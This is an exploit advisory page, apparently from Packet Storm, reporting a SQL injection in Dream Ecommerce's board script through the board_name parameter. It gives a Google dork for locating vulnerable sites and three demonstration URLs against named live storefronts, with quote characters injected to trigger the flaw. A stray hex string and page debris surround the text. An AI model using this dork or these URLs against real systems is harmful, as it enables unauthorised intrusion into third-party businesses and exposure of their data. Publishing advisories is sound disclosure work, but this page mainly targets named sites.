Sites by Dream Ecommerce suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
52b20400a47b6882b3bbd18d02cb2ef6a2fef8095646abad551e6d4dd308f99b# Exploit Title: dreamecommerce sql injection Vulnerability
#
# Google Dork: inurl:board/sview.php?board_name=
#
# Date: 09/28/2012
#
# Author: Crim3R
#
# download Link Or Vendor Home: http://dreamecommerce.net/
#
# Tested on: all
#
==================================
board_name parametr is injectable
D3M0 :
www.doubljuwholesale.com/board/sview.php?board_name=SDREAMBOARD1'''&choose2=&choose1=&pagenow=6&CB=&ID=12&PHPSESSID=69a947d939f55fe7b9cdf60c15dd2efa
http://doublju.com/board/sview.php?board_name=SDREAMBOARD1'''&CB=&choose1=SU|CT|NM&choose2=1&ID=11&pagenow=1
http://from-switch.com/board/sview.php?board_name=SDREAMBOARD3%27%27%27%27&choose2=&choose1=&pagenow=1&CB=&ID=8
===============Crim3R@Att.Net=========
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed